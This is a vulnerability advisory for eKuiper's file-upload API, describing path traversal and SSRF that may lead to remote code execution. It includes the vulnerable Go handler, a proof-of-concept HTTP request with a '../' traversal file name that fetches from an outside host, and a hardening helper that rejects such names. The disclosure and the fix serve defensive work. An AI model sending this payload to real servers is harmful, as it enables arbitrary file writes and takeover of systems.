GHSA-gj54-gwj9-x2c6 – github.com/lf-edge/ekuiper
Package
Manager: go
Name: github.com/lf-edge/ekuiper
Vulnerable Version: >=0 <=1.14.7
Severity
Level: High
CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N/E:P/RL:U/RC:C
CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
EPSS: N/A (percentile: N/A)
Details
eKuiper /config/uploads API arbitrary file writing may lead to RCE

### Summary

The eKuiper /config/uploads API supports fetching remote web URLs and saving the result into the local upload directory, but applies no security restrictions, so a `../` sequence in the requested file name results in arbitrary file writing. If eKuiper runs with root privileges, RCE can be achieved by writing crontab files or SSH keys.

### Details

```go
func fileUploadHandler(w http.ResponseWriter, r *http.Request) {
	switch r.Method {
	// Upload or overwrite a file
	case http.MethodPost:
		switch r.Header.Get("Content-Type") {
		case "application/json":
			fc := &fileContent{}
			defer r.Body.Close()
			err := json.NewDecoder(r.Body).Decode(fc)
			if err != nil {
				handleError(w, err, "Invalid body: Error decoding file json", logger)
				return
			}
			err = fc.Validate()
			if err != nil {
				handleError(w, err, "Invalid body: missing necessary field", logger)
				return
			}
			// fc.Name is joined to uploadDir with no traversal check
			filePath := filepath.Join(uploadDir, fc.Name)
			err = upload(fc)
```

- The fc.Name parameter is not safely filtered.

### PoC

```
POST /config/uploads HTTP/1.1
Host: localhost:9081
Content-Type: application/json
Content-Length: 89

{ "name": "../../../../tmp/success", "file": "http://192.168.65.254:8888/success" }
```

### Impact

Tested and verified only on 1.14.3 and 1.14.1; theoretically all versions using this code could be affected.

1. SSRF
2. Path traversal
3. May lead to RCE

The reporter is m0d9 from Tencent YunDing Lab.
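The root cause above is that `fc.Name` reaches `filepath.Join(uploadDir, fc.Name)` unchecked. The following is an added example of the containment check a maintainer would put in front of that join; it is hypothetical hardening written for this page, not eKuiper's own code, and the helper name `safeUploadPath` and the upload directory `/var/lib/ekuiper/uploads` are assumptions. It only addresses the path-traversal half of the finding, not the remote fetch (SSRF) side.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// ErrUnsafeName is returned when a requested upload name would escape uploadDir.
var ErrUnsafeName = errors.New("upload name escapes upload directory")

// safeUploadPath performs the same filepath.Join as the vulnerable handler but
// rejects any name that would resolve outside uploadDir (hypothetical helper).
// Note: this is a lexical check; it does not follow symlinks inside uploadDir.
func safeUploadPath(uploadDir, name string) (string, error) {
	// Absolute or empty names are never acceptable upload targets.
	if name == "" || filepath.IsAbs(name) || strings.HasPrefix(name, "/") {
		return "", ErrUnsafeName
	}
	// Clean the base once so the Rel comparison below is exact.
	base := filepath.Clean(uploadDir)
	// Join collapses "../" segments; Rel then tells us whether the result
	// still lies beneath base.
	full := filepath.Join(base, name)
	rel, err := filepath.Rel(base, full)
	if err != nil {
		return "", ErrUnsafeName
	}
	// "." means the name resolved to the directory itself; ".." or "../x"
	// means it climbed out of it. Both are rejected.
	if rel == "." || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", ErrUnsafeName
	}
	return full, nil
}

func main() {
	// Constructed sample names, including the traversal string from the PoC above.
	for _, n := range []string{"ok.json", "../../../../tmp/success", "sub/../x", "/etc/passwd"} {
		p, err := safeUploadPath("/var/lib/ekuiper/uploads", n)
		fmt.Printf("%-26s -> %q, %v\n", n, p, err)
	}
}
```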
Metadata
Created: 2025-07-03T14:22:05Z
Modified: 2025-07-03T14:22:05Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-gj54-gwj9-x2c6/GHSA-gj54-gwj9-x2c6.json
CWE IDs: ["CWE-434"]
Alternative ID: N/A
Finding: F027
Auto approve: 1